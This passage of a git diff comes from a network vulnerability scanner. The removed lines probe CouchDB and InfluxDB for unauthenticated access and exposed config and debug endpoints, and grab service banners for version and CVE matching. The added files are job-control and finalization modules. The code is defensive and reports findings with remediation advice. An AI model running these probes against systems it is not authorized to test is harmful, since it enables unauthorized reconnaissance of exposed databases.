= struct.unpack(' len(data): - return None - return data[str_start+4:str_start+4+str_len-1].decode('utf-8', errors='ignore') - - - - # ── CouchDB ────────────────────────────────────────────────────── - - def _service_info_couchdb(self, target, port): # default port: 5984 - """ - Probe Apache CouchDB HTTP API for unauthenticated access, admin panel, - database listing, and version-based CVE matching. - """ - findings, raw = [], {"version": None} - base_url = f"http://{target}:{port}" - - # 1. Root endpoint — identifies CouchDB and extracts version - try: - resp = requests.get(base_url, timeout=3) - if not resp.ok: - return None - data = resp.json() - if "couchdb" not in str(data).lower(): - return None # Not CouchDB - raw["version"] = data.get("version") - raw["vendor"] = data.get("vendor", {}).get("name") if isinstance(data.get("vendor"), dict) else None - except Exception: - return None - - if raw["version"]: - findings.append(Finding( - severity=Severity.LOW, - title=f"CouchDB version disclosed: {raw['version']}", - description=f"CouchDB on {target}:{port} reports version {raw['version']}.", - evidence=f"GET / → version={raw['version']}", - remediation="Restrict network access to the CouchDB port.", - cwe_id="CWE-200", - confidence="certain", - )) - ver_match = _re.match(r'(\d+\.\d+(?:\.\d+)?)', raw["version"]) - if ver_match: - findings += check_cves("couchdb", ver_match.group(1)) - - # 2. Database listing — unauthenticated access to /_all_dbs - try: - resp = requests.get(f"{base_url}/_all_dbs", timeout=3) - if resp.ok: - dbs = resp.json() - if isinstance(dbs, list): - raw["databases"] = dbs - user_dbs = [d for d in dbs if not d.startswith("_")] - findings.append(Finding( - severity=Severity.CRITICAL if user_dbs else Severity.HIGH, - title=f"CouchDB unauthenticated database listing ({len(dbs)} databases)", - description=f"/_all_dbs accessible without credentials. " - f"{'User databases exposed: ' + ', '.join(user_dbs[:5]) if user_dbs else 'Only system databases found.'}", - evidence=f"Databases: {', '.join(dbs[:10])}" + (f"... (+{len(dbs)-10} more)" if len(dbs) > 10 else ""), - remediation="Enable CouchDB authentication via [admins] section in local.ini.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="certain", - )) - except Exception: - pass - - # 3. Admin panel (Fauxton) accessibility - try: - resp = requests.get(f"{base_url}/_utils/", timeout=3, allow_redirects=True) - if resp.ok and ("fauxton" in resp.text.lower() or "couchdb" in resp.text.lower()): - findings.append(Finding( - severity=Severity.HIGH, - title="CouchDB admin panel (Fauxton) accessible", - description=f"/_utils/ on {target}:{port} serves the admin web interface.", - evidence=f"GET /_utils/ returned {resp.status_code}, content-length={len(resp.text)}", - remediation="Restrict access to /_utils via reverse proxy or bind to localhost.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="certain", - )) - except Exception: - pass - - # 4. Config endpoint — critical if accessible - try: - resp = requests.get(f"{base_url}/_node/_local/_config", timeout=3) - if resp.ok and resp.text.startswith("{"): - findings.append(Finding( - severity=Severity.CRITICAL, - title="CouchDB configuration exposed without authentication", - description="/_node/_local/_config returns full server configuration including credentials.", - evidence=f"GET /_node/_local/_config returned {resp.status_code}", - remediation="Enable admin authentication immediately.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="certain", - )) - except Exception: - pass - - if not findings: - findings.append(Finding(Severity.INFO, "CouchDB probe clean", "No issues detected.")) - return probe_result(raw_data=raw, findings=findings) - - # ── InfluxDB ──────────────────────────────────────────────────── - - def _service_info_influxdb(self, target, port): # default port: 8086 - """ - Probe InfluxDB HTTP API for version disclosure, unauthenticated access, - and database listing. - """ - findings, raw = [], {"version": None} - base_url = f"http://{target}:{port}" - - # 1. Ping — extract version from X-Influxdb-Version header - try: - resp = requests.get(f"{base_url}/ping", timeout=3) - version = resp.headers.get("X-Influxdb-Version") - if not version: - return None # Not InfluxDB - raw["version"] = version - findings.append(Finding( - severity=Severity.LOW, - title=f"InfluxDB version disclosed: {version}", - description=f"InfluxDB on {target}:{port} reports version {version}.", - evidence=f"X-Influxdb-Version: {version}", - remediation="Restrict network access to the InfluxDB port.", - cwe_id="CWE-200", - confidence="certain", - )) - ver_match = _re.match(r'(\d+\.\d+(?:\.\d+)?)', version) - if ver_match: - findings += check_cves("influxdb", ver_match.group(1)) - except Exception: - return None - - # 2. Unauthenticated database listing - try: - resp = requests.get(f"{base_url}/query", params={"q": "SHOW DATABASES"}, timeout=3) - if resp.ok: - data = resp.json() - results = data.get("results", []) - if results and not results[0].get("error"): - series = results[0].get("series", []) - db_names = [] - for s in series: - for row in s.get("values", []): - if row: - db_names.append(row[0]) - raw["databases"] = db_names - user_dbs = [d for d in db_names if d not in ("_internal",)] - findings.append(Finding( - severity=Severity.CRITICAL if user_dbs else Severity.HIGH, - title=f"InfluxDB unauthenticated access ({len(db_names)} databases)", - description=f"SHOW DATABASES succeeded without credentials. " - f"{'User databases: ' + ', '.join(user_dbs[:5]) if user_dbs else 'Only internal databases found.'}", - evidence=f"Databases: {', '.join(db_names[:10])}", - remediation="Enable InfluxDB authentication in the configuration ([http] auth-enabled = true).", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - elif results and results[0].get("error"): - # Auth required — good - findings.append(Finding( - severity=Severity.INFO, - title="InfluxDB authentication enforced", - description="SHOW DATABASES rejected without credentials.", - evidence=f"Error: {results[0]['error'][:80]}", - confidence="certain", - )) - except Exception: - pass - - # 3. Debug endpoint exposure - try: - resp = requests.get(f"{base_url}/debug/vars", timeout=3) - if resp.ok and "memstats" in resp.text: - findings.append(Finding( - severity=Severity.MEDIUM, - title="InfluxDB debug endpoint exposed (/debug/vars)", - description="Go runtime debug variables accessible, leaking memory stats and internal state.", - evidence=f"GET /debug/vars returned {resp.status_code}", - remediation="Disable or restrict access to debug endpoints.", - owasp_id="A05:2021", - cwe_id="CWE-200", - confidence="certain", - )) - except Exception: - pass - - if not findings: - findings.append(Finding(Severity.INFO, "InfluxDB probe clean", "No issues detected.")) - return probe_result(raw_data=raw, findings=findings) - - # Product patterns for generic banner version extraction. - # Maps regex → CVE DB product name. Each regex must have a named group 'ver'. - _GENERIC_BANNER_PATTERNS = [ - (_re.compile(r'OpenSSH[_\s](?P\d+\.\d+(?:\.\d+)?)', _re.I), "openssh"), - (_re.compile(r'Apache[/ ](?P\d+\.\d+(?:\.\d+)?)', _re.I), "apache"), - (_re.compile(r'nginx[/ ](?P\d+\.\d+(?:\.\d+)?)', _re.I), "nginx"), - (_re.compile(r'Exim\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "exim"), - (_re.compile(r'Postfix[/ ]?(?:.*?smtpd)?\s*(?P\d+\.\d+(?:\.\d+)?)', _re.I), "postfix"), - (_re.compile(r'ProFTPD\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "proftpd"), - (_re.compile(r'vsftpd\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "vsftpd"), - (_re.compile(r'Redis[/ ](?:server\s+)?v?(?P\d+\.\d+(?:\.\d+)?)', _re.I), "redis"), - (_re.compile(r'Samba\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "samba"), - (_re.compile(r'Asterisk\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "asterisk"), - (_re.compile(r'MySQL[/ ](?P\d+\.\d+(?:\.\d+)?)', _re.I), "mysql"), - (_re.compile(r'PostgreSQL\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "postgresql"), - (_re.compile(r'MongoDB\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "mongodb"), - (_re.compile(r'Elasticsearch[/ ](?P\d+\.\d+(?:\.\d+)?)', _re.I), "elasticsearch"), - (_re.compile(r'memcached\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "memcached"), - (_re.compile(r'TightVNC[/ ](?P\d+\.\d+(?:\.\d+)?)', _re.I), "tightvnc"), - ] - - def _service_info_generic(self, target, port): - """ - Attempt a generic TCP banner grab for uncovered ports. - - Performs three checks on the banner: - 1. Version disclosure — flags any product/version string as info leak. - 2. CVE matching — runs extracted versions against the CVE database. - 3. Unauthenticated data exposure — flags services that send data - without any client request (potential auth bypass). - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings = [] - raw = {"banner": None} - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(2) - sock.connect((target, port)) - raw_bytes = sock.recv(512) - sock.close() - if not raw_bytes: - return None - except Exception as e: - return probe_error(target, port, "generic", e) - - # --- Protocol fingerprinting: detect known services on non-standard ports --- - reclassified = self._generic_fingerprint_protocol(raw_bytes, target, port) - if reclassified is not None: - return reclassified - - # --- Standard banner analysis for truly unknown services --- - data = raw_bytes.decode('utf-8', errors='ignore') - banner = ''.join(ch if 32 <= ord(ch) < 127 else '.' for ch in data) - readable = banner.strip().replace('.', '') - if not readable: - return None - raw["banner"] = banner.strip() - banner_text = raw["banner"] - - # --- 1. Version extraction + CVE check --- - for pattern, product in self._GENERIC_BANNER_PATTERNS: - m = pattern.search(banner_text) - if m: - version = m.group("ver") - raw["product"] = product - raw["version"] = version - findings.append(Finding( - severity=Severity.LOW, - title=f"Service version disclosed: {product} {version}", - description=f"Banner on {target}:{port} reveals {product} {version}. " - "Version disclosure aids attackers in targeting known vulnerabilities.", - evidence=f"Banner: {banner_text[:80]}", - remediation="Suppress or genericize the service banner.", - cwe_id="CWE-200", - confidence="certain", - )) - findings += check_cves(product, version) - break # First match wins - - return probe_result(raw_data=raw, findings=findings) - - # Protocol signatures for reclassifying services on non-standard ports. - # Each entry: (check_function, protocol_name, probe_method_name) - # Check functions receive raw bytes and return True if matched. - @staticmethod - def _is_redis_banner(data): - """Redis RESP: starts with +, -, :, $, or * (protocol type bytes).""" - return len(data) > 0 and data[0:1] in (b'+', b'-', b'$', b'*', b':') - - @staticmethod - def _is_ftp_banner(data): - """FTP: 220 greeting.""" - return data[:4] in (b'220 ', b'220-') - - @staticmethod - def _is_smtp_banner(data): - """SMTP: 220 greeting with SMTP/ESMTP keyword.""" - text = data[:200].decode('utf-8', errors='ignore').upper() - return text.startswith('220') and ('SMTP' in text or 'ESMTP' in text) - - @staticmethod - def _is_mysql_handshake(data): - """MySQL: 3-byte length + seq + protocol version 0x0a.""" - if len(data) > 4: - payload = data[4:] - return payload[0:1] == b'\x0a' - return False - - @staticmethod - def _is_rsync_banner(data): - """Rsync: @RSYNCD: version.""" - return data.startswith(b'@RSYNCD:') - - @staticmethod - def _is_telnet_banner(data): - """Telnet: IAC (0xFF) followed by WILL/WONT/DO/DONT.""" - return len(data) >= 2 and data[0] == 0xFF and data[1] in (0xFB, 0xFC, 0xFD, 0xFE) - - _PROTOCOL_SIGNATURES = None # lazy init to avoid forward reference issues - - def _generic_fingerprint_protocol(self, raw_bytes, target, port): - """Try to identify the protocol from raw banner bytes. - - If a known protocol is detected, reclassifies the port and runs the - appropriate specialized probe directly. - - Returns - ------- - dict or None - Probe result from the specialized probe, or None if no match. - """ - signatures = [ - (self._is_redis_banner, "redis", "_service_info_redis"), - (self._is_ftp_banner, "ftp", "_service_info_ftp"), - (self._is_smtp_banner, "smtp", "_service_info_smtp"), - (self._is_mysql_handshake, "mysql", "_service_info_mysql"), - (self._is_rsync_banner, "rsync", "_service_info_rsync"), - (self._is_telnet_banner, "telnet", "_service_info_telnet"), - ] - - for check_fn, proto, method_name in signatures: - try: - if check_fn(raw_bytes): - # Reclassify port protocol for future reference - port_protocols = self.state.get("port_protocols", {}) - old_proto = port_protocols.get(port, "unknown") - port_protocols[port] = proto - self.P(f"Protocol reclassified: port {port} {old_proto} → {proto} (banner fingerprint)") - - # Run the specialized probe directly - probe_fn = getattr(self, method_name, None) - if probe_fn: - return probe_fn(target, port) - except Exception: - continue - return None diff --git a/extensions/business/cybersec/red_mesh/services/__init__.py b/extensions/business/cybersec/red_mesh/services/__init__.py new file mode 100644 index 00000000..29662998 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/services/__init__.py @@ -0,0 +1,111 @@ +from .config import ( + get_attestation_config, + get_graybox_budgets_config, + get_llm_agent_config, + resolve_config_block, +) +from .control import ( + purge_job, + stop_and_delete_job, + stop_monitoring, +) +from .finalization import maybe_finalize_pass +from .launch import launch_local_jobs +from .launch_api import ( + announce_launch, + build_network_workers, + build_webapp_workers, + launch_network_scan, + launch_test, + launch_webapp_scan, + normalize_common_launch_options, + parse_exceptions, + resolve_active_peers, + resolve_enabled_features, + validation_error, +) +from .query import ( + get_job_analysis, + get_job_archive, + get_job_data, + get_job_progress, + list_local_jobs, + list_network_jobs, +) +from .reconciliation import ( + get_distributed_job_reconciliation_config, + reconcile_job_workers, +) +from .secrets import ( + R1fsSecretStore, + collect_secret_refs_from_job_config, + persist_job_config_with_secrets, + resolve_job_config_secrets, +) +from .scan_strategy import ( + ScanStrategy, + coerce_scan_type, + get_scan_strategy, + iter_scan_strategies, +) +from .state_machine import ( + INTERMEDIATE_JOB_STATUSES, + TERMINAL_JOB_STATUSES, + can_transition_job_status, + is_intermediate_job_status, + is_terminal_job_status, + set_job_status, +) +from .triage import ( + get_job_archive_with_triage, + get_job_triage, + update_finding_triage, +) + +__all__ = [ + "INTERMEDIATE_JOB_STATUSES", + "ScanStrategy", + "TERMINAL_JOB_STATUSES", + "can_transition_job_status", + "coerce_scan_type", + "get_attestation_config", + "get_graybox_budgets_config", + "get_llm_agent_config", + "resolve_config_block", + "announce_launch", + "build_network_workers", + "build_webapp_workers", + "get_scan_strategy", + "get_job_analysis", + "get_job_archive", + "get_job_data", + "get_job_progress", + "is_intermediate_job_status", + "is_terminal_job_status", + "iter_scan_strategies", + "launch_local_jobs", + "launch_network_scan", + "launch_test", + "launch_webapp_scan", + "list_local_jobs", + "list_network_jobs", + "maybe_finalize_pass", + "normalize_common_launch_options", + "parse_exceptions", + "persist_job_config_with_secrets", + "purge_job", + "R1fsSecretStore", + "resolve_job_config_secrets", + "collect_secret_refs_from_job_config", + "resolve_active_peers", + "resolve_enabled_features", + "get_distributed_job_reconciliation_config", + "reconcile_job_workers", + "set_job_status", + "stop_and_delete_job", + "stop_monitoring", + "get_job_archive_with_triage", + "get_job_triage", + "update_finding_triage", + "validation_error", +] diff --git a/extensions/business/cybersec/red_mesh/services/config.py b/extensions/business/cybersec/red_mesh/services/config.py new file mode 100644 index 00000000..4880bb39 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/services/config.py @@ -0,0 +1,137 @@ +def _config_attr_name(block_name): + return f"cfg_{block_name.lower()}" + + +def resolve_config_block(owner, block_name, defaults, normalizer=None): + """Resolve one shallow nested config block with partial override merge.""" + merged = dict(defaults or {}) + override = getattr(owner, _config_attr_name(block_name), None) + if override is None: + config_data = getattr(owner, "config_data", None) + if isinstance(config_data, dict): + override = config_data.get(block_name) + if override is None: + config = getattr(owner, "CONFIG", None) + if isinstance(config, dict): + override = config.get(block_name) + if isinstance(override, dict): + merged.update(override) + + if callable(normalizer): + normalized = normalizer(dict(merged), dict(defaults or {})) + if isinstance(normalized, dict): + return normalized + return merged + + +DEFAULT_LLM_AGENT_CONFIG = { + "ENABLED": False, + "TIMEOUT": 120.0, + "AUTO_ANALYSIS_TYPE": "security_assessment", +} + +DEFAULT_ATTESTATION_CONFIG = { + "ENABLED": True, + "PRIVATE_KEY": "", + "MIN_SECONDS_BETWEEN_SUBMITS": 86400.0, + "RETRIES": 2, +} + +DEFAULT_GRAYBOX_BUDGETS_CONFIG = { + "AUTH_ATTEMPTS": 10, + "ROUTE_DISCOVERY": 100, + "STATEFUL_ACTIONS": 1, +} + + +def get_llm_agent_config(owner): + """Return normalized LLM agent integration config.""" + def _normalize(merged, defaults): + enabled = bool(merged.get("ENABLED", defaults["ENABLED"])) + + try: + timeout = float(merged.get("TIMEOUT", defaults["TIMEOUT"])) + except (TypeError, ValueError): + timeout = defaults["TIMEOUT"] + if timeout <= 0: + timeout = defaults["TIMEOUT"] + + analysis_type = str( + merged.get("AUTO_ANALYSIS_TYPE") or defaults["AUTO_ANALYSIS_TYPE"] + ).strip() or defaults["AUTO_ANALYSIS_TYPE"] + + return { + "ENABLED": enabled, + "TIMEOUT": timeout, + "AUTO_ANALYSIS_TYPE": analysis_type, + } + + return resolve_config_block( + owner, + "LLM_AGENT", + DEFAULT_LLM_AGENT_CONFIG, + normalizer=_normalize, + ) + + +def get_attestation_config(owner): + """Return normalized attestation config.""" + def _normalize(merged, defaults): + enabled = bool(merged.get("ENABLED", defaults["ENABLED"])) + private_key = str(merged.get("PRIVATE_KEY") or defaults["PRIVATE_KEY"]) + + try: + min_seconds = float( + merged.get("MIN_SECONDS_BETWEEN_SUBMITS", defaults["MIN_SECONDS_BETWEEN_SUBMITS"]) + ) + except (TypeError, ValueError): + min_seconds = defaults["MIN_SECONDS_BETWEEN_SUBMITS"] + if min_seconds < 0: + min_seconds = defaults["MIN_SECONDS_BETWEEN_SUBMITS"] + + try: + retries = int(merged.get("RETRIES", defaults["RETRIES"])) + except (TypeError, ValueError): + retries = defaults["RETRIES"] + if retries < 0: + retries = defaults["RETRIES"] + + return { + "ENABLED": enabled, + "PRIVATE_KEY": private_key, + "MIN_SECONDS_BETWEEN_SUBMITS": min_seconds, + "RETRIES": retries, + } + + return resolve_config_block( + owner, + "ATTESTATION", + DEFAULT_ATTESTATION_CONFIG, + normalizer=_normalize, + ) + + +def get_graybox_budgets_config(owner): + """Return normalized graybox execution budgets.""" + def _normalize(merged, defaults): + def _bounded_int(key, minimum, default): + try: + value = int(merged.get(key, default)) + except (TypeError, ValueError): + value = default + if value < minimum: + return default + return value + + return { + "AUTH_ATTEMPTS": _bounded_int("AUTH_ATTEMPTS", 1, defaults["AUTH_ATTEMPTS"]), + "ROUTE_DISCOVERY": _bounded_int("ROUTE_DISCOVERY", 1, defaults["ROUTE_DISCOVERY"]), + "STATEFUL_ACTIONS": _bounded_int("STATEFUL_ACTIONS", 0, defaults["STATEFUL_ACTIONS"]), + } + + return resolve_config_block( + owner, + "GRAYBOX_BUDGETS", + DEFAULT_GRAYBOX_BUDGETS_CONFIG, + normalizer=_normalize, + ) diff --git a/extensions/business/cybersec/red_mesh/services/control.py b/extensions/business/cybersec/red_mesh/services/control.py new file mode 100644 index 00000000..f0b7b836 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/services/control.py @@ -0,0 +1,230 @@ +from ..constants import ( + JOB_STATUS_FINALIZED, + JOB_STATUS_RUNNING, + JOB_STATUS_SCHEDULED_FOR_STOP, + JOB_STATUS_STOPPED, + RUN_MODE_CONTINUOUS_MONITORING, +) +from ..repositories import ArtifactRepository, JobStateRepository +from .secrets import collect_secret_refs_from_job_config +from .state_machine import set_job_status + + +def _job_repo(owner): + getter = getattr(type(owner), "_get_job_state_repository", None) + if callable(getter): + return getter(owner) + return JobStateRepository(owner) + + +def _artifact_repo(owner): + getter = getattr(type(owner), "_get_artifact_repository", None) + if callable(getter): + return getter(owner) + return ArtifactRepository(owner) + + +def _write_job_record(owner, job_id, job_specs, context): + write_job_record = getattr(type(owner), "_write_job_record", None) + if callable(write_job_record): + return write_job_record(owner, job_id, job_specs, context=context) + _job_repo(owner).put_job(job_id, job_specs) + return job_specs + + +def _delete_job_record(owner, job_id): + delete_job_record = getattr(type(owner), "_delete_job_record", None) + if callable(delete_job_record): + delete_job_record(owner, job_id) + return + _job_repo(owner).delete_job(job_id) + + +def stop_and_delete_job(owner, job_id: str): + """ + Stop a running job, mark it stopped, then delegate to purge_job + for full R1FS + CStore cleanup. + """ + local_workers = owner.scan_jobs.get(job_id) + if local_workers: + owner.P(f"Stopping and deleting job {job_id}.") + for local_worker_id, job in local_workers.items(): + owner.P(f"Stopping job {job_id} on local worker {local_worker_id}.") + job.stop() + owner.P(f"Job {job_id} stopped.") + owner.scan_jobs.pop(job_id, None) + + raw_job_specs = _job_repo(owner).get_job(job_id) + if isinstance(raw_job_specs, dict): + _, job_specs = owner._normalize_job_record(job_id, raw_job_specs) + worker_entry = job_specs.setdefault("workers", {}).setdefault(owner.ee_addr, {}) + worker_entry["finished"] = True + worker_entry["canceled"] = True + set_job_status(job_specs, JOB_STATUS_STOPPED) + owner._emit_timeline_event(job_specs, "stopped", "Job stopped and deleted", actor_type="user") + _write_job_record(owner, job_id, job_specs, context="stop_and_delete") + else: + owner._log_audit_event("scan_stopped", {"job_id": job_id}) + return {"status": "success", "job_id": job_id, "cids_deleted": 0, "cids_total": 0} + + owner._log_audit_event("scan_stopped", {"job_id": job_id}) + return owner.purge_job(job_id) + + +def purge_job(owner, job_id: str): + """ + Purge a job: delete all R1FS artifacts, clean up live progress keys, + then tombstone the CStore entry. + """ + raw = _job_repo(owner).get_job(job_id) + if not isinstance(raw, dict): + return {"status": "error", "message": f"Job {job_id} not found."} + + _, job_specs = owner._normalize_job_record(job_id, raw) + + job_status = job_specs.get("job_status", "") + workers = job_specs.get("workers", {}) + if workers and any(not w.get("finished") for w in workers.values()): + return {"status": "error", "message": "Cannot purge a running job. Stop it first."} + if job_status not in (JOB_STATUS_FINALIZED, JOB_STATUS_STOPPED) and workers: + return {"status": "error", "message": "Cannot purge a running job. Stop it first."} + + cids = set() + + def _track(cid, source): + if cid and isinstance(cid, str) and cid not in cids: + cids.add(cid) + owner.P(f"[PURGE] Collected CID {cid} from {source}") + + _track(job_specs.get("job_config_cid"), "job_specs.job_config_cid") + artifacts = _artifact_repo(owner) + job_config = artifacts.get_job_config(job_specs) if job_specs.get("job_config_cid") else {} + if isinstance(job_config, dict): + for secret_ref in collect_secret_refs_from_job_config(job_config): + _track(secret_ref, "job_config.secret_ref") + + job_cid = job_specs.get("job_cid") + if job_cid: + _track(job_cid, "job_specs.job_cid") + try: + archive = artifacts.get_json(job_cid) + if isinstance(archive, dict): + owner.P(f"[PURGE] Archive fetched OK, {len(archive.get('passes', []))} passes") + for pi, pass_data in enumerate(archive.get("passes", [])): + _track(pass_data.get("aggregated_report_cid"), f"archive.passes[{pi}].aggregated_report_cid") + for addr, wr in (pass_data.get("worker_reports") or {}).items(): + if isinstance(wr, dict): + _track(wr.get("report_cid"), f"archive.passes[{pi}].worker_reports[{addr}].report_cid") + else: + owner.P(f"[PURGE] Archive fetch returned non-dict: {type(archive)}", color='y') + except Exception as e: + owner.P(f"[PURGE] Failed to fetch archive {job_cid}: {e}", color='r') + + for addr, w in workers.items(): + _track(w.get("report_cid"), f"workers[{addr}].report_cid") + + for ri, ref in enumerate(job_specs.get("pass_reports", [])): + report_cid = ref.get("report_cid") + if report_cid: + _track(report_cid, f"pass_reports[{ri}].report_cid") + try: + pass_data = artifacts.get_pass_report(report_cid) + if isinstance(pass_data, dict): + _track(pass_data.get("aggregated_report_cid"), f"pass_reports[{ri}]->aggregated_report_cid") + for addr, wr in (pass_data.get("worker_reports") or {}).items(): + if isinstance(wr, dict): + _track(wr.get("report_cid"), f"pass_reports[{ri}]->worker_reports[{addr}].report_cid") + else: + owner.P(f"[PURGE] Pass report fetch returned non-dict: {type(pass_data)}", color='y') + except Exception as e: + owner.P(f"[PURGE] Failed to fetch pass report {report_cid}: {e}", color='r') + + owner.P(f"[PURGE] Total CIDs collected: {len(cids)}: {sorted(cids)}") + + deleted, failed = 0, 0 + for cid in cids: + try: + success = artifacts.delete(cid, show_logs=True, raise_on_error=False) + if success: + deleted += 1 + owner.P(f"[PURGE] Deleted CID {cid}") + else: + failed += 1 + owner.P(f"[PURGE] delete_file returned False for CID {cid}", color='r') + except Exception as e: + owner.P(f"[PURGE] Failed to delete CID {cid}: {e}", color='r') + failed += 1 + + if failed > 0: + owner.P(f"Purge incomplete: {failed}/{len(cids)} CIDs failed. CStore kept.", color='r') + return { + "status": "partial", + "job_id": job_id, + "cids_deleted": deleted, + "cids_failed": failed, + "cids_total": len(cids), + "message": "Some R1FS artifacts could not be deleted. Retry purge later.", + } + + all_live = _job_repo(owner).list_live_progress() + if isinstance(all_live, dict): + prefix = f"{job_id}:" + for key in all_live: + if key.startswith(prefix): + _job_repo(owner).delete_live_progress(key) + + _job_repo(owner).delete_job_triage(job_id) + _delete_job_record(owner, job_id) + + owner.P(f"Purged job {job_id}: {deleted}/{len(cids)} CIDs deleted.") + owner._log_audit_event("job_purged", {"job_id": job_id, "cids_deleted": deleted, "cids_total": len(cids)}) + + return {"status": "success", "job_id": job_id, "cids_deleted": deleted, "cids_total": len(cids)} + + +def stop_monitoring(owner, job_id: str, stop_type: str = "SOFT"): + """ + Stop a job (any run mode with HARD stop, continuous-only for SOFT stop). + """ + raw_job_specs = _job_repo(owner).get_job(job_id) + if not raw_job_specs: + return {"error": "Job not found", "job_id": job_id} + + _, job_specs = owner._normalize_job_record(job_id, raw_job_specs) + stop_type = str(stop_type).upper() + is_continuous = job_specs.get("run_mode") == RUN_MODE_CONTINUOUS_MONITORING + + if stop_type != "HARD" and not is_continuous: + return {"error": "SOFT stop is only supported for CONTINUOUS_MONITORING jobs", "job_id": job_id} + + passes_completed = job_specs.get("job_pass", 1) + + if stop_type == "HARD": + local_workers = owner.scan_jobs.get(job_id) + if local_workers: + for local_worker_id, job in local_workers.items(): + owner.P(f"Stopping job {job_id} on local worker {local_worker_id}.") + job.stop() + owner.scan_jobs.pop(job_id, None) + + worker_entry = job_specs.setdefault("workers", {}).setdefault(owner.ee_addr, {}) + worker_entry["finished"] = True + worker_entry["canceled"] = True + + set_job_status(job_specs, JOB_STATUS_STOPPED) + owner._emit_timeline_event(job_specs, "stopped", "Job stopped", actor_type="user") + owner.P(f"Hard stop for job {job_id} after {passes_completed} passes") + else: + set_job_status(job_specs, JOB_STATUS_SCHEDULED_FOR_STOP) + owner._emit_timeline_event(job_specs, "scheduled_for_stop", "Stop scheduled", actor_type="user") + owner.P(f"[CONTINUOUS] Soft stop scheduled for job {job_id} (will stop after current pass)") + + _write_job_record(owner, job_id, job_specs, context="stop_monitoring") + + return { + "job_status": job_specs["job_status"], + "stop_type": stop_type, + "job_id": job_id, + "passes_completed": passes_completed, + "pass_reports": job_specs.get("pass_reports", []), + } diff --git a/extensions/business/cybersec/red_mesh/services/finalization.py b/extensions/business/cybersec/red_mesh/services/finalization.py new file mode 100644 index 00000000..4a604475 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/services/finalization.py @@ -0,0 +1,319 @@ +import random + +from ..constants import ( + JOB_STATUS_ANALYZING, + JOB_STATUS_COLLECTING, + JOB_STATUS_FINALIZED, + JOB_STATUS_FINALIZING, + JOB_STATUS_RUNNING, + JOB_STATUS_SCHEDULED_FOR_STOP, + JOB_STATUS_STOPPED, + MAX_CONTINUOUS_PASSES, + RUN_MODE_CONTINUOUS_MONITORING, + RUN_MODE_SINGLEPASS, +) +from ..models import AggregatedScanData, PassReport, PassReportRef, WorkerReportMeta +from ..repositories import ArtifactRepository, JobStateRepository +from .config import get_attestation_config +from .config import get_llm_agent_config +from .state_machine import is_intermediate_job_status, is_terminal_job_status, set_job_status + + +def _job_repo(owner): + getter = getattr(type(owner), "_get_job_state_repository", None) + if callable(getter): + return getter(owner) + return JobStateRepository(owner) + + +def _artifact_repo(owner): + getter = getattr(type(owner), "_get_artifact_repository", None) + if callable(getter): + return getter(owner) + return ArtifactRepository(owner) + + +def _write_job_record(owner, job_key, job_specs, context): + write_job_record = getattr(type(owner), "_write_job_record", None) + if callable(write_job_record): + return write_job_record(owner, job_key, job_specs, context=context) + return job_specs + + +def maybe_finalize_pass(owner): + """ + Launcher finalizes completed passes and orchestrates continuous monitoring. + """ + all_jobs = _job_repo(owner).list_jobs() + artifacts = _artifact_repo(owner) + + for job_key, job_specs in all_jobs.items(): + normalized_key, job_specs = owner._normalize_job_record(job_key, job_specs) + if normalized_key is None: + continue + + is_launcher = job_specs.get("launcher") == owner.ee_addr + if not is_launcher: + continue + + workers = job_specs.get("workers", {}) + if not workers: + continue + + run_mode = job_specs.get("run_mode", RUN_MODE_SINGLEPASS) + job_status = job_specs.get("job_status", JOB_STATUS_RUNNING) + all_finished = all(w.get("finished") for w in workers.values()) + next_pass_at = job_specs.get("next_pass_at") + job_pass = job_specs.get("job_pass", 1) + job_id = job_specs.get("job_id") + if is_terminal_job_status(job_status): + if not job_specs.get("job_cid") and job_specs.get("pass_reports"): + owner.P(f"[STUCK RECOVERY] {job_id} is {job_status} but has no job_cid — retrying archive build", color='y') + owner._build_job_archive(job_id, job_specs) + continue + if is_intermediate_job_status(job_status): + continue + + if all_finished and next_pass_at is None: + pass_date_started = owner._get_timeline_date(job_specs, "pass_started") or owner._get_timeline_date(job_specs, "created") + pass_date_completed = owner.time() + now_ts = pass_date_completed + + set_job_status(job_specs, JOB_STATUS_COLLECTING) + job_specs = _write_job_record(owner, job_key, job_specs, context="finalize_collecting") + + node_reports = owner._collect_node_reports(workers) + aggregated = owner._get_aggregated_report(node_reports) if node_reports else {} + + risk_score = 0 + flat_findings = [] + risk_result = None + if aggregated: + risk_result, flat_findings = owner._compute_risk_and_findings(aggregated) + risk_score = risk_result["score"] + job_specs["risk_score"] = risk_score + owner.P(f"Risk score for job {job_id} pass {job_pass}: {risk_score}/100") + + job_config = owner._get_job_config(job_specs) + llm_cfg = get_llm_agent_config(owner) + llm_text = None + summary_text = None + if llm_cfg["ENABLED"] and aggregated: + set_job_status(job_specs, JOB_STATUS_ANALYZING) + job_specs = _write_job_record(owner, job_key, job_specs, context="finalize_analyzing") + llm_text = owner._run_aggregated_llm_analysis(job_id, aggregated, job_config) + llm_status = getattr(owner, "_last_llm_analysis_status", None) + if llm_status in {"api_request_error", "provider_request_error"}: + owner.P( + f"Skipping quick summary for job {job_id} after non-retryable LLM failure ({llm_status})", + color='y' + ) + else: + summary_text = owner._run_quick_summary_analysis(job_id, aggregated, job_config) + + llm_failed = True if (llm_cfg["ENABLED"] and (llm_text is None or summary_text is None)) else None + if llm_failed: + owner._emit_timeline_event( + job_specs, "llm_failed", + f"LLM analysis unavailable for pass {job_pass}", + meta={"pass_nr": job_pass} + ) + + worker_metas = {} + for addr, report in node_reports.items(): + nr_findings = 